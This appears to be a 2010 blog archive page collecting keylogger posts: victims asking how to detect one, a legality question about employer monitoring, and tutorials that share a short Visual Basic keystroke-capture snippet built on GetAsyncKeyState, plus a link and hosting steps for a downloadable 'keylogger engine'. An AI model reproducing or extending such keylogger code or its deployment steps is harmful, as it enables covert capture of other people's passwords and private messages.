Archive for the 'key logger' Category
This is a short video about my keylogger, which I made in VB6 …
You can download the file with project(source)here: (beneath)
This program is for educational purposes only !! Please be aware , I’m not responsible for anything that happens wrong…
P.s.: This program is not a virus !
edit: I deleted the link above since a lot [...]
July 13th, 2010 | Posted in key logger | 25 Comments
I found out today that my brother installed a key logger on my computer, this sure pissed me off. Is it against the law? and what should i do?
do you live in the same house ? do you both use the same computer ? NO YOU CAN’T SUE ./ OR TOURCHER [...]
July 12th, 2010 | Posted in key logger | 4 Comments
Is it legal if an employer monitors internet usage using a key logger? Especially if they aren’t telling the employee’s they are doing it….?
It depends on where you are. Some states have passed laws requiring notice before an employer may electronically monitor employees. There is no federal law that covers the issue.
July 9th, 2010 | Posted in key logger | 12 Comments
how to make one with visual basic
Code-
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
Timer1-
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
Text1.Text = Text1.Text + Chr(i)
End If
Next i
Clear all-
Text1.Text = “”
Duration : 0:3:33
July 8th, 2010 | Posted in key logger | No Comments
I know that someone put a key logger on my laptop, the problem is that I have no idea how to find it or remove it…So as you can guess, I have absolutely no privacy! I need help!!!
The free version of superantispyware
http://superantispyware.com is a good software for finding and deleting key loggers
July 6th, 2010 | Posted in key logger | 1 Comment
Please visit http://www.hackingfever.com for more cool videos.
What you will need:
-The keylogger engine (this is the zip file!)
http://www.savefile.com/files/1572009
-Filezilla
http://www.filezilla-project.org
-The free website (you don’t have to change anything)
http://www.topcities.com
Disclaimer: I am not responsible for any damage you may cause to your computer or the law, you may only use this on your own computer.
Duration : 0:7:4
July 4th, 2010 | Posted in key logger | 25 Comments
I think some lamer I know who cannot get laid put a key logger on my Mac cos he’s nosey. How can I detect it to be 100% sure, I’ve tried some programs like Macscan, which other FREE programs are there for a Mac to detect?
Thanks
Unless someone has written one for OS X and you [...]
July 4th, 2010 | Posted in key logger | 2 Comments
My parents have a history of not knowing how to gradually give there children privacy and at my age i really do need a tiny bit.
how would i be able to tell if someone has put a key logger on my laptop?
would there be a file name or something?
This software scans your PC to see [...]
July 1st, 2010 | Posted in key logger | 2 Comments
Visual Basic 2008 Tutorial – KeyLogger by o0ogam3ro0o
———–
code
———–
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
For i = 1 To 255
result = 0
[...]
June 30th, 2010 | Posted in key logger | 9 Comments
Ok so this kid in school was giving free games to everyone and it turns out that they all had key loggers on them. Kinda creepy… anyway I would appreciate some help with this problem so this kid doesn’t go on all of our facebook profiles.
AVG Anti Virus. Go to download.com and get it for [...]
June 29th, 2010 | Posted in key logger | 2 Comments